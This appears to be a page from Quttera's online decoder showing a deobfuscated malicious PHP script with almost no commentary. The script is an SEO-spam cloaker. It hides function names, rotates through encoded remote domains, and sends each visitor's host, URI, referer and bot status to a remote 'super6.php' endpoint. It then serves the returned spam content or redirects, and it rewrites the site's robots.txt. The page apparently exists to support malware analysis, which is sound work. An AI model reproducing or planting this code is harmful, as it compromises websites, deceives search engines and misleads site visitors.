Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


goto tjuGU;
 Jp1uO: $model = stristr($duri, "/?") ? "?" : $model;
 goto W4jkH;
 ZqKe5: $referer = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
 goto S9JrS;
	 EHPXL: if (strpos($duri, $string) !== false) {
	 $zz = 1;
	 $duri = str_replace($string, '', $duri);
	 $istest = true;
	 
}
 goto hV0E9;
 akdMz: $string = "3665-link2";
 goto MaVgV;
 xO4Qz: preg_match("/\/([^\/]+\.php)/", $duri, $matches);
 goto Gqlzi;
 S9JrS: $http = is_https() ? "https" : "http";
 goto S9rXN;
 V3yuz: $html_content = request($xmlname, $param);
 goto f6gMC;
 S_gzu: $model = "index";
 goto xO4Qz;
 x9fdZ: create_robots($http . "://" . $host);
 goto V3yuz;
	 Gqlzi: if (!empty($matches)) {
	 $model_file = $matches[1];
		 if (($position = strpos($duri, $model_file)) !== false) {
		 $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/");
		 
	}
	 $model = str_replace(".php", '', $model_file);
	 
}
 goto Jp1uO;
 MaVgV: $host = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : '';
 goto ZqKe5;
	 Sh3NP: function is_https() {
		 if (isset($_SERVER["HTTPS"])) {
		 $https = strtolower($_SERVER["HTTPS"]);
			 if ($https !== "off" && $https !== '') {
			 return true;
			 
		}
		 
	}
		 if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") {
		 return true;
		 
	}
		 if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) {
		 $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]);
			 if ($front_end_https !== "off" && $front_end_https !== '') {
			 return true;
			 
		}
		 
	}
	 return false;
	 
}
 goto G8L21;
 cbh6v: $model_file = "index.php";
 goto S_gzu;
	 hV0E9: if ($duri != "/") {
	 $duri = str_replace("/" . $model_file, '', $duri);
	 $duri = str_replace("/index.php", '', $duri);
	 $duri = str_replace("!", '', $duri);
	 
}
 goto QcU_9;
	 XrmJH: function disbot() {
	 $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : '';
	 $bots = array("googlebot", "bing", "yahoo", "google");
		 foreach ($bots as $bot) {
			 if (strpos($user_agent, $bot) !== false) {
			 return 1;
			 
		}
		 
	}
	 return 2;
	 
}
 goto uXAFN;
 tjuGU: $xmlname = array("%%36%36%35%2D%79%76%61%78%32%31%%2E%70%%72%6E%70/6%6D%%61*E.B%6C%6D", "+3+6%%35%2D%79%.1%78+2%%33*E%7A%72%67.E.F%%/1%74.E%2E.B%6C.D", "+3%%36%35%2D%79%%61%78+2%31%33%2E/A%6E%%61.E%61%2E%67.2.3", "%33%36%+5%2D/9%76%61/8%32%%33%2E%%68%76%61.7%.6.6.C%2E%67%%63");
 goto akdMz;
	 dV8bO: function request($webs, $param) {
	 $functions = func();
	 shuffle($webs);
		 foreach ($webs as $domain) {
		 $domain_decoded = $functions[2](urldecode($domain));
		 $url = "http://" . $domain_decoded . "/super6.php?" . $param;
			 if (function_exists("wp_remote_get")) {
			 $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla/5.0 (compatible;
			 WordPress)"));
				 if (!is_wp_error($response)) {
				 $body = wp_remote_retrieve_body($response);
				 return $body;
				 
			}
			 
		}
			 if (function_exists("curl_init")) {
			 $ch = curl_init();
			 curl_setopt($ch, CURLOPT_URL, $url);
			 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
			 curl_setopt($ch, CURLOPT_TIMEOUT, 30);
			 $response = curl_exec($ch);
				 if (!curl_errno($ch)) {
				 curl_close($ch);
				 return $response;
				 
			}
			 curl_close($ch);
			 
		}
			 if (ini_get("allow_url_fopen")) {
			 $context = stream_context_create(array("http" => array("timeout" => 30)));
			 $response = @$functions[1]($url, false, $context);
				 if ($response !== false) {
				 return $response;
				 
			}
			 
		}
		 
	}
	 return "nobotuseragent";
	 
}
 goto JB7IA;
	 G8L21: function create_robots($url) {
	 $functions = func();
	 $path = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt";
	 $content = "User-agent: *" . PHP_EOL . "Allow: /" . PHP_EOL . PHP_EOL . "Sitemap: " . $url . "/sitemap.xml" . PHP_EOL;
		 if (!file_exists($path)) {
		 @$functions[0]($path, $content);
		 
	}
		 else {
		 $existing_content = $functions[1]($path);
			 if ($existing_content !== $content) {
			 @$functions[0]($path, $content);
			 
		}
		 
	}
	 
}
 goto dV8bO;
	 f6gMC: if (strpos($html_content, "nobotuseragent") === false) {
	 $response_handlers = array("okhtml" => array("header" => "Content-type: text/html;
	 charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent5page" => array("header" => "HTTP/1.1 0 Internal Server Error"), "404page" => array("header" => "HTTP/1.1 4 Not Found"), "301page" => array("header" => "HTTP/1.1 301 Moved Permanently", "cache_control" => "no-cache, no-store, must-revalidate", "replace" => "301page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml;
	 charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true));
		 foreach ($response_handlers as $key => $handler) {
			 if (strpos($html_content, $key) !== false) {
			 @header($handler["header"]);
				 if (isset($handler["cache_control"])) {
				 @header("Cache-Control: " . $handler["cache_control"]);
				 @header("Pragma: no-cache");
				 @header("Expires: 0");
				 
			}
				 if (isset($handler["replace"])) {
				 $html_content = str_replace($handler["replace"], '', $html_content);
				 
			}
				 if (isset($handler["test_echo"]) && $istest) {
				 echo $string;
				 
			}
				 if (isset($handler["redirect"])) {
				 @header("Location: " . $html_content);
				 
			}
				 elseif (isset($handler["output"])) {
				 echo $html_content;
				 
			}
			 die;
			 
		}
		 
	}
	 
}
 goto XrmJH;
 QcU_9: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "model" => $model, "version" => $istest ? $string : ''));
 goto x9fdZ;
	 uXAFN: function drequest_uri() {
		 if (isset($_SERVER["REQUEST_URI"])) {
		 return $_SERVER["REQUEST_URI"];
		 
	}
		 if (isset($_SERVER["argv"])) {
		 return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0];
		 
	}
	 return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"];
	 
}
 goto Sh3NP;
 wiqSZ: $duri = drequest_uri() ?: "/";
 goto cbh6v;
 S9rXN: $zz = disbot();
 goto wiqSZ;
 W4jkH: $istest = false;
 goto EHPXL;
	 JB7IA: function func() {
	 $chars = range("a", "z");
	 return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[15] . $chars[20] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[6] . $chars[4] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . "13");
	 
}



© 2023 Quttera Ltd. All rights reserved.